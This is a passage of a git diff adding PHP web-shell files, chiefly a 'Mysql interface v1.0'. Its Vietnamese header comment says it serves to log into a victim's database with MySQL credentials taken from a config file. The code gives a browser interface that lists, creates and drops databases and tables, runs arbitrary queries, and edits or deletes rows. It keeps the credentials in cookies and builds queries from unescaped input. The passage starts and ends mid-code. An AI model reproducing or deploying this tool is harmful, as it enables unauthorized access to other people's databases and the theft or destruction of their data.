+ echo "<h1>Wrong Password!</h1>\n"; + echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n"; + echo "</center></td></tr></table>\n"; + echo "</body>\n"; + echo "</html>\n"; + } else { + header_html(); + if( $action == "listDBs" ) + listDatabases(); + else if( $action == "createDB" ) + createDatabase(); + else if( $action == "dropDB" ) + dropDatabase(); + else if( $action == "listTables" ) + listTables(); + else if( $action == "createTable" ) + createTable(); + else if( $action == "dropTable" ) + dropTable(); + else if( $action == "viewSchema" ) + viewSchema(); + else if( $action == "query" ) + viewData( $queryStr ); + else if( $action == "addField" ) + manageField( "add" ); + else if( $action == "addField_submit" ) + manageField_submit( "add" ); + else if( $action == "editField" ) + manageField( "edit" ); + else if( $action == "editField_submit" ) + manageField_submit( "edit" ); + else if( $action == "dropField" ) + dropField(); + else if( $action == "viewData" ) + viewData( "" ); + else if( $action == "addData" ) + manageData( "add" ); + else if( $action == "addData_submit" ) + manageData_submit( "add" ); + else if( $action == "editData" ) + manageData( "edit" ); + else if( $action == "editData_submit" ) + manageData_submit( "edit" ); + else if( $action == "deleteData" ) + deleteData(); + else if( $action == "utils" ) + utils(); + + mysql_close( $mysqlHandle); + footer_html(); + } +} + +?> diff --git a/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg b/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg new file mode 100644 index 0000000..c4d51e7 Binary files /dev/null and b/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.jpg differ diff --git a/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.php b/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.php new file mode 100644 index 0000000..28a5e14 --- /dev/null +++ b/php/PHPshell/Mysql interface v1.0/Mysql interface v1.0.php @@ -0,0 +1,1166 @@ +<? +/* +* Mysql interface v1.0 +* ------------------------------- +* Description : +* Dung` de login vao` CSDL cua victim khi da biet user va` pass cua mysql thong qua file config +*/ + +$HOSTNAME = "localhost"; + +function logon() { +global $PHP_SELF; + +setcookie( "mysql_web_admin_username" ); +setcookie( "mysql_web_admin_password" ); +echo "<html>\n"; +echo "<head>\n"; +echo "<title>Mysql interface</title>\n"; +echo "</head>\n"; +echo "<body>\n"; +echo "<table width=100% height=100%><tr><td><center>\n"; +echo "<table cellpadding=2><tr><td bgcolor=#0090FF><center>\n"; +echo "<table cellpadding=20><tr><td bgcolor=#ffffff><center>\n"; +echo "<h1><b><font color=#FF0000>Mysql Interface v1.0</font></b></h1>\n"; +echo "<form action='$PHP_SELF'>\n"; +echo "<input type=hidden name=action value=logon_submit>\n"; +echo "<table cellpadding=5 cellspacing=1>\n"; +echo "<tr><td>Username </td><td> <input type=text name=username></td></tr>\n"; +echo "<tr><td>Password </td><td> <input type=password name=password></td></tr>\n"; +echo "</table><p>\n"; +echo "<input type=submit value='Enter'>\n"; +echo "<input type=reset value='Clear'><br>\n"; +echo "</form>\n"; +echo "</center></td></tr></table>\n"; +echo "</center></td></tr></table>\n"; +echo "<p><hr width=300>\n"; +echo "<font size=2>\n"; +echo "Copyright &copy; 2005\n <br>"; +echo "</font>\n"; +echo "</center></td></tr></table>\n"; +echo "</body>\n"; +echo "</html>\n"; +} + +function logon_submit() { +global $username, $password, $PHP_SELF; + +setcookie( "mysql_web_admin_username", $username ); +setcookie( "mysql_web_admin_password", $password ); +echo "<html>"; +echo "<head>"; +echo "<META HTTP-EQUIV=Refresh CONTENT='0; URL=$PHP_SELF?action=listDBs'>"; +echo "</head>"; +echo "</html>"; +} + +function echoQueryResult() { +global $queryStr, $errMsg; + +if( $errMsg == "" ) $errMsg = "Success"; +if( $queryStr != "" ) { + echo "<table cellpadding=5>\n"; + echo "<tr><td>Query</td><td>$queryStr</td></tr>\n"; + echo "<tr><td>Result</td><td>$errMsg</td></tr>\n"; + echo "</table><p>\n"; +} +} + +function listDatabases() { +global $mysqlHandle, $PHP_SELF; + +echo "<h1>Database List</h1>\n"; + +echo "<form action='$PHP_SELF'>\n"; +echo "<input type=hidden name=action value=createDB>\n"; +echo "<input type=text name=dbname>\n"; +echo "<input type=submit value='Create Database'>\n"; +echo "</form>\n"; +echo "<hr>\n"; + +echo "<table cellspacing=1 cellpadding=5>\n"; + +$pDB = mysql_list_dbs( $mysqlHandle ); +$num = mysql_num_rows( $pDB ); +for( $i = 0; $i < $num; $i++ ) { + $dbname = mysql_dbname( $pDB, $i ); + echo "<tr>\n"; + echo "<td>$dbname</td>\n"; + echo "<td><a href='$PHP_SELF?action=listTables&dbname=$dbname'>Table</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=dropDB&dbname=$dbname' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=dumpDB&dbname=$dbname'>Dump</a></td>\n"; + echo "</tr>\n"; +} +echo "</table>\n"; +} + +function createDatabase() { +global $mysqlHandle, $dbname, $PHP_SELF; + +mysql_create_db( $dbname, $mysqlHandle ); +listDatabases(); +} + +function dropDatabase() { +global $mysqlHandle, $dbname, $PHP_SELF; + +mysql_drop_db( $dbname, $mysqlHandle ); +listDatabases(); +} + +function listTables() { +global $mysqlHandle, $dbname, $PHP_SELF; + +echo "<h1>Table List</h1>\n"; +echo "<p class=location>$dbname</p>\n"; +echoQueryResult(); +echo "<form action='$PHP_SELF'>\n"; +echo "<input type=hidden name=action value=createTable>\n"; +echo "<input type=hidden name=dbname value=$dbname>\n"; +echo "<input type=text name=tablename>\n"; +echo "<input type=submit value='Create Table'>\n"; +echo "</form>\n"; +echo "<form action='$PHP_SELF'>\n"; +echo "<input type=hidden name=action value=query>\n"; +echo "<input type=hidden name=dbname value=$dbname>\n"; +echo "<input type=text size=40 name=queryStr>\n"; +//echo "<textarea cols=30 rows=3 name=queryStr></textarea><br>"; +echo "<input type=submit value='Query'>\n"; +echo "</form>\n"; +echo "<hr>\n"; + +$pTable = mysql_list_tables( $dbname ); + +if( $pTable == 0 ) { + $msg = mysql_error(); + echo "<h3>Error : $msg</h3><p>\n"; + return; +} +$num = mysql_num_rows( $pTable ); + +echo "<table cellspacing=1 cellpadding=5>\n"; + +for( $i = 0; $i < $num; $i++ ) { + $tablename = mysql_tablename( $pTable, $i ); + + echo "<tr>\n"; + echo "<td>\n"; + echo "$tablename\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>Data</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Database \'$dbname\'?')\">Drop</a>\n"; + echo "</td>\n"; + echo "<td>\n"; + echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>\n"; + echo "</td>\n"; + echo "</tr>\n"; +} + +echo "</table>"; +} + +function createTable() { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg; + +$queryStr = "CREATE TABLE $tablename ( no INT )"; +mysql_select_db( $dbname, $mysqlHandle ); +mysql_query( $queryStr, $mysqlHandle ); +$errMsg = mysql_error(); + +listTables(); +} + +function dropTable() { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg; + +$queryStr = "DROP TABLE $tablename"; +mysql_select_db( $dbname, $mysqlHandle ); +mysql_query( $queryStr, $mysqlHandle ); +$errMsg = mysql_error(); + +listTables(); +} + +function viewSchema() { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg; + +echo "<h1>Table Schema</h1>\n"; +echo "<p class=location>$dbname &gt; $tablename</p>\n"; + +echoQueryResult(); + +echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n"; +echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename'>View Data</a>\n"; +echo "<hr>\n"; + +$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); +$num = mysql_num_rows( $pResult ); + +echo "<table cellspacing=1 cellpadding=5>\n"; +echo "<tr>\n"; +echo "<th>Field</th>\n"; +echo "<th>Type</th>\n"; +echo "<th>Null</th>\n"; +echo "<th>Key</th>\n"; +echo "<th>Default</th>\n"; +echo "<th>Extra</th>\n"; +echo "<th colspan=2>Action</th>\n"; +echo "</tr>\n"; + +for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + echo "<tr>\n"; + echo "<td>".$field["Field"]."</td>\n"; + echo "<td>".$field["Type"]."</td>\n"; + echo "<td>".$field["Null"]."</td>\n"; + echo "<td>".$field["Key"]."</td>\n"; + echo "<td>".$field["Default"]."</td>\n"; + echo "<td>".$field["Extra"]."</td>\n"; + $fieldname = $field["Field"]; + echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n"; + echo "</tr>\n"; +} +echo "</table>\n"; +} + +function manageField( $cmd ) { +global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF; + +if( $cmd == "add" ) + echo "<h1>Add Field</h1>\n"; +else if( $cmd == "edit" ) { + echo "<h1>Edit Field</h1>\n"; + $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); + $num = mysql_num_rows( $pResult ); + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + if( $field["Field"] == $fieldname ) { + $fieldtype = $field["Type"]; + $fieldkey = $field["Key"]; + $fieldextra = $field["Extra"]; + $fieldnull = $field["Null"]; + $fielddefault = $field["Default"]; + break; + } + } + $type = strtok( $fieldtype, " (,)\n" ); + if( strpos( $fieldtype, "(" ) ) { + if( $type == "enum" | $type == "set" ) { + $valuelist = strtok( " ()\n" ); + } else { + $M = strtok( " (,)\n" ); + if( strpos( $fieldtype, "," ) ) + $D = strtok( " (,)\n" ); + } + } +} + +echo "<p class=location>$dbname &gt; $tablename</p>\n"; +echo "<form action=$PHP_SELF>\n"; + +if( $cmd == "add" ) + echo "<input type=hidden name=action value=addField_submit>\n"; +else if( $cmd == "edit" ) { + echo "<input type=hidden name=action value=editField_submit>\n"; + echo "<input type=hidden name=old_name value=$fieldname>\n"; +} +echo "<input type=hidden name=dbname value=$dbname>\n"; +echo "<input type=hidden name=tablename value=$tablename>\n"; + +echo "<h3>Name</h3>\n"; +echo "<input type=text name=name value=$fieldname><p>\n"; +?> + +<h3>Type</h3> + +<font size=2> +* `M' indicates the maximum display size.<br> +* `D' applies to floating-point types and indicates the number of digits following the decimal point.<br> +</font> + +<table> +<tr> +<th>Type</th><th>&nbspM&nbsp</th><th>&nbspD&nbsp</th><th>unsigned</th><th>zerofill</th><th>binary</th> +</tr> +<tr> +<td><input type=radio name=type value="TINYINT" <? if( $type == "tinyint" ) echo "checked";?>>TINYINT (-128 ~ 127)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="SMALLINT" <? if( $type == "smallint" ) echo "checked";?>>SMALLINT (-32768 ~ 32767)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMINT" <? if( $type == "mediumint" ) echo "checked";?>>MEDIUMINT (-8388608 ~ 8388607)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="INT" <? if( $type == "int" ) echo "checked";?>>INT (-2147483648 ~ 2147483647)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="BIGINT" <? if( $type == "bigint" ) echo "checked";?>>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="FLOAT" <? if( $type == "float" ) echo "checked";?>>FLOAT</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DOUBLE" <? if( $type == "double" ) echo "checked";?>>DOUBLE</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DECIMAL" <? if( $type == "decimal" ) echo "checked";?>>DECIMAL(NUMERIC)</td> +<td align=center>O</td> +<td align=center>O</td> +<td>&nbsp</td> +<td align=center>O</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DATE" <? if( $type == "date" ) echo "checked";?>>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="DATETIME" <? if( $type == "datetime" ) echo "checked";?>>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TIMESTAMP" <? if( $type == "timestamp" ) echo "checked";?>>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TIME" <? if( $type == "time" ) echo "checked";?>>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="YEAR" <? if( $type == "year" ) echo "checked";?>>YEAR (1901 ~ 2155, 0000, YYYY)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="CHAR" <? if( $type == "char" ) echo "checked";?>>CHAR</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td align=center>O</td> +</tr> +<tr> +<td><input type=radio name=type value="VARCHAR" <? if( $type == "varchar" ) echo "checked";?>>VARCHAR</td> +<td align=center>O</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td align=center>O</td> +</tr> +<tr> +<td><input type=radio name=type value="TINYTEXT" <? if( $type == "tinytext" ) echo "checked";?>>TINYTEXT (0 ~ 255)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TEXT" <? if( $type == "text" ) echo "checked";?>>TEXT (0 ~ 65535)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMTEXT" <? if( $type == "mediumtext" ) echo "checked";?>>MEDIUMTEXT (0 ~ 16777215)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="LONGTEXT" <? if( $type == "longtext" ) echo "checked";?>>LONGTEXT (0 ~ 4294967295)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="TINYBLOB" <? if( $type == "tinyblob" ) echo "checked";?>>TINYBLOB (0 ~ 255)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="BLOB" <? if( $type == "blob" ) echo "checked";?>>BLOB (0 ~ 65535)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="MEDIUMBLOB" <? if( $type == "mediumblob" ) echo "checked";?>>MEDIUMBLOB (0 ~ 16777215)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="LONGBLOB" <? if( $type == "longblob" ) echo "checked";?>>LONGBLOB (0 ~ 4294967295)</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +<td>&nbsp</td> +</tr> +<tr> +<td><input type=radio name=type value="ENUM" <? if( $type == "enum" ) echo "checked";?>>ENUM</td> +<td colspan=5><center>value list</center></td> +</tr> +<tr> +<td><input type=radio name=type value="SET" <? if( $type == "set" ) echo "checked";?>>SET</td> +<td colspan=5><center>value list</center></td> +</tr> + +</table> +<table> +<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: 'apple', 'orange', 'banana') </th></tr> +<tr> +<td align=center><input type=text size=4 name=M <? if( $M != "" ) echo "value=$M";?>></td> +<td align=center><input type=text size=4 name=D <? if( $D != "" ) echo "value=$D";?>></td> +<td align=center><input type=checkbox name=unsigned value="UNSIGNED" <? if( strpos( $fieldtype, "unsigned" ) ) echo "checked";?>></td> +<td align=center><input type=checkbox name=zerofill value="ZEROFILL" <? if( strpos( $fieldtype, "zerofill" ) ) echo "checked";?>></td> +<td align=center><input type=checkbox name=binary value="BINARY" <? if( strpos( $fieldtype, "binary" ) ) echo "checked";?>></td> +<td align=center><input type=text size=60 name=valuelist <? if( $valuelist != "" ) echo "value=\"$valuelist\"";?>></td> +</tr> +</table> + + +<h3>Flags</h3> +<table> +<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr> +<tr> +<td align=center><input type=checkbox name=not_null value="NOT NULL" <? if( $fieldnull != "YES" ) echo "checked";?>></td> +<td align=center><input type=text name=default_value <? if( $fielddefault != "" ) echo "value=$fielddefault";?>></td> +<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" <? if( $fieldextra == "auto_increment" ) echo "checked";?>></td> +<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" <? if( $fieldkey == "PRI" ) echo "checked";?>></td> +</tr> +</table> + +<p> + +<? +if( $cmd == "add" ) + echo "<input type=submit value='Add Field'>\n"; +else if( $cmd == "edit" ) + echo "<input type=submit value='Edit Field'>\n"; +echo "<input type=button value=Cancel onClick='history.back()'>\n"; +echo "</form>\n"; +} + +function manageField_submit( $cmd ) { +global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg, + $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist; + +if( $cmd == "add" ) + $queryStr = "ALTER TABLE $tablename ADD $name "; +else if( $cmd == "edit" ) + $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name "; + +if( $M != "" ) + if( $D != "" ) + $queryStr .= "$type($M,$D) "; + else + $queryStr .= "$type($M) "; +else if( $valuelist != "" ) { + $valuelist = stripslashes( $valuelist ); + $queryStr .= "$type($valuelist) "; +} else + $queryStr .= "$type "; + +$queryStr .= "$unsigned $zerofill $binary "; + +if( $default_value != "" ) + $queryStr .= "DEFAULT '$default_value' "; + +$queryStr .= "$not_null $auto_increment"; + +mysql_select_db( $dbname, $mysqlHandle ); +mysql_query( $queryStr, $mysqlHandle ); +$errMsg = mysql_error(); + +// key change +$keyChange = false; +$result = mysql_query( "SHOW KEYS FROM $tablename" ); +$primary = ""; +while( $row = mysql_fetch_array($result) ) + if( $row["Key_name"] == "PRIMARY" ) { + if( $row[Column_name] == $name ) + $keyChange = true; + else + $primary .= ", $row[Column_name]"; + } +if( $primary_key == "PRIMARY KEY" ) { + $primary .= ", $name"; + $keyChange = !$keyChange; +} +$primary = substr( $primary, 2 ); +if( $keyChange == true ) { + $q = "ALTER TABLE $tablename DROP PRIMARY KEY"; + mysql_query( $q ); + $queryStr .= "<br>\n" . $q; + $errMsg .= "<br>\n" . mysql_error(); + $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )"; + mysql_query( $q ); + $queryStr .= "<br>\n" . $q; + $errMsg .= "<br>\n" . mysql_error(); +} + +viewSchema(); +} + +function dropField() { +global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg; + +$queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname"; +mysql_select_db( $dbname, $mysqlHandle ); +mysql_query( $queryStr , $mysqlHandle ); +$errMsg = mysql_error(); + +viewSchema(); +} + +function viewData( $queryStr ) { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby; + +echo "<h1>Data in Table</h1>\n"; +if( $tablename != "" ) + echo "<p class=location>$dbname &gt; $tablename</p>\n"; +else + echo "<p class=location>$dbname</p>\n"; + +$queryStr = stripslashes( $queryStr ); +if( $queryStr == "" ) { + $queryStr = "SELECT * FROM $tablename"; + if( $orderby != "" ) + $queryStr .= " ORDER BY $orderby"; + echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n"; + echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n"; +} + +$pResult = mysql_db_query( $dbname, $queryStr ); +$errMsg = mysql_error(); + +$GLOBALS[queryStr] = $queryStr; + +if( $pResult == false ) { + echoQueryResult(); + return; +} +if( $pResult == 1 ) { + $errMsg = "Success"; + echoQueryResult(); + return; +} + +echo "<hr>\n"; + +$row = mysql_num_rows( $pResult ); +$col = mysql_num_fields( $pResult ); + +if( $row == 0 ) { + echo "No Data Exist!"; + return; +} + +if( $rowperpage == "" ) $rowperpage = 20; +if( $page == "" ) $page = 0; +else $page--; +mysql_data_seek( $pResult, $page * $rowperpage ); + +echo "<table cellspacing=1 cellpadding=2>\n"; +echo "<tr>\n"; +for( $i = 0; $i < $col; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + echo "<th>"; + echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n"; + echo "</th>\n"; +} +echo "<th colspan=2>Action</th>\n"; +echo "</tr>\n"; + +for( $i = 0; $i < $rowperpage; $i++ ) { + $rowArray = mysql_fetch_row( $pResult ); + if( $rowArray == false ) break; + echo "<tr>\n"; + $key = ""; + for( $j = 0; $j < $col; $j++ ) { + $data = $rowArray[$j]; + + $field = mysql_fetch_field( $pResult, $j ); + if( $field->primary_key == 1 ) + $key .= "&" . $field->name . "=" . $data; + + if( strlen( $data ) > 20 ) + $data = substr( $data, 0, 20 ) . "..."; + $data = htmlspecialchars( $data ); + echo "<td>\n"; + echo "$data\n"; + echo "</td>\n"; + } + + if( $key == "" ) + echo "<td colspan=2>no Key</td>\n"; + else { + echo "<td><a href='$PHP_SELF?action=editData&dbname=$dbname&tablename=$tablename$key'>Edit</a></td>\n"; + echo "<td><a href='$PHP_SELF?action=deleteData&dbname=$dbname&tablename=$tablename$key' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n"; + } + echo "</tr>\n"; +} +echo "</table>\n"; + +echo "<font size=2>\n"; +echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n"; +echo "<font color=green>\n"; +echo ($page+1)."/".(int)($row/$rowperpage+1)." page"; +echo "</font>\n"; +echo " | "; +if( $page > 0 ) { + echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page); + if( $orderby != "" ) + echo "&orderby=$orderby"; + echo "'>Prev</a>\n"; +} else + echo "Prev"; +echo " | "; +if( $page < ($row/$rowperpage)-1 ) { + echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2); + if( $orderby != "" ) + echo "&orderby=$orderby"; + echo "'>Next</a>\n"; +} else + echo "Next"; +echo " | "; +if( $row > $rowperpage ) { + echo "<input type=text size=4 name=page>\n"; + echo "<input type=submit value='Go'>\n"; +} +echo "</form>\n"; +echo "</font>\n"; +} + +function manageData( $cmd ) { +global $mysqlHandle, $dbname, $tablename, $PHP_SELF; + +if( $cmd == "add" ) + echo "<h1>Add Data</h1>\n"; +else if( $cmd == "edit" ) { + echo "<h1>Edit Data</h1>\n"; + $pResult = mysql_list_fields( $dbname, $tablename ); + $num = mysql_num_fields( $pResult ); + + $key = ""; + for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_field( $pResult, $i ); + if( $field->primary_key == 1 ) + if( $field->numeric == 1 ) + $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND "; + else + $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND "; + } + $key = substr( $key, 0, strlen($key)-4 ); + + mysql_select_db( $dbname, $mysqlHandle ); + $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $key", $mysqlHandle ); + $data = mysql_fetch_array( $pResult ); +} + +echo "<p class=location>$dbname &gt; $tablename</p>\n"; + +echo "<form action='$PHP_SELF' method=post>\n"; +if( $cmd == "add" ) + echo "<input type=hidden name=action value=addData_submit>\n"; +else if( $cmd == "edit" ) + echo "<input type=hidden name=action value=editData_submit>\n"; +echo "<input type=hidden name=dbname value=$dbname>\n"; +echo "<input type=hidden name=tablename value=$tablename>\n"; +echo "<table cellspacing=1 cellpadding=2>\n"; +echo "<tr>\n"; +echo "<th>Name</th>\n"; +echo "<th>Type</th>\n"; +echo "<th>Function</th>\n"; +echo "<th>Data</th>\n"; +echo "</tr>\n"; + +$pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" ); +$num = mysql_num_rows( $pResult ); + +$pResultLen = mysql_list_fields( $dbname, $tablename ); + +for( $i = 0; $i < $num; $i++ ) { + $field = mysql_fetch_array( $pResult ); + $fieldname = $field["Field"]; + $fieldtype = $field["Type"]; + $len = mysql_field_len( $pResultLen, $i ); + + echo "<tr>"; + echo "<td>$fieldname</td>"; + echo "<td>".$field["Type"]."</td>"; + echo "<td>\n"; + echo "<select name=${fieldname}_function>\n"; + echo "<option>\n"; + echo "<option>ASCII\n"; + echo "<option>CHAR\n"; + echo "<option>SOUNDEX\n"; + echo "<option>CURDATE\n"; + echo "<option>CURTIME\n"; + echo "<option>FROM_DAYS\n"; + echo "<option>FROM_UNIXTIME\n"; + echo "<option>NOW\n"; + echo "<option>PASSWORD\n"; + echo "<option>PERIOD_ADD\n"; + echo "<option>PERIOD_DIFF\n"; + echo "<option>TO_DAYS\n"; + echo "<option>USER\n"; + echo "<option>WEEKDAY\n"; + echo "<option>RAND\n"; + echo "</select>\n"; + echo "</td>\n"; + $value = htmlspecialchars($data[$i]); + if( $cmd == "add" ) { + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) { + echo "<td>\n"; + if( $type == "enum" ) + echo "<select name=$fieldname>\n"; + else if( $type == "set" ) + echo "<select name=$fieldname size=4 multiple>\n"; + echo strtok( "'" ); + while( $str = strtok( "'" ) ) { + echo "<option>$str\n"; + strtok( "'" ); + } + echo "</select>\n"; + echo "</td>\n"; + } else { + if( $len < 40 ) + echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n"; + else + echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n"; + } + } else if( $cmd == "edit" ) { + $type = strtok( $fieldtype, " (,)\n" ); + if( $type == "enum" || $type == "set" ) { + echo "<td>\n"; + if( $type == "enum" ) + echo "<select name=$fieldname>\n"; + else if( $type == "set" ) + echo "<select name=$fieldname size=4 multiple>\n"; + echo strtok( "'" ); + while( $str = strtok( "'" ) ) { + if( $value == $str ) + echo "<option selected>$str\n"; + else + echo "<option>$str\n"; + strtok( "'" ); + } + echo "</select>\n"; + echo "</td>\n"; + } else { + if( $len < 40 ) + echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n"; + else + echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n"; + } + } + echo "</tr>"; +} +echo "</table><p>\n"; +if( $cmd == "add" ) + echo "<input type=submit value='Add Data'>\n"; +else if( $cmd == "edit" ) + echo "<input type=submit value='Edit Data'>\n"; +echo "<input type=button value='Cancel' onClick='history.back()'>\n"; +echo "</form>\n"; +} + +function manageData_submit( $cmd ) { +global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg; + +$pResult = mysql_list_fields( $dbname, $tablename ); +$num = mysql_num_fields( $pResult ); + +mysql_select_db( $dbname, $mysqlHandle ); +if( $cmd == "add" ) + $queryStr = "INSERT INTO $tablename VALUES ("; +else if( $cmd == "edit" ) + $queryStr = "REPLACE INTO $tablename VALUES ("; +for( $i = 0; $i < $num-1; $i++ ) { + $field = mysql_fetch_field( $pResult ); + $func = $GLOBALS[$field->name."_function"]; + if( $func != "" ) + $queryStr .= " $func("; + if( $field->numeric == 1 ) { + $queryStr .= $GLOBALS[$field->name]; + if( $func != "" ) + $queryStr 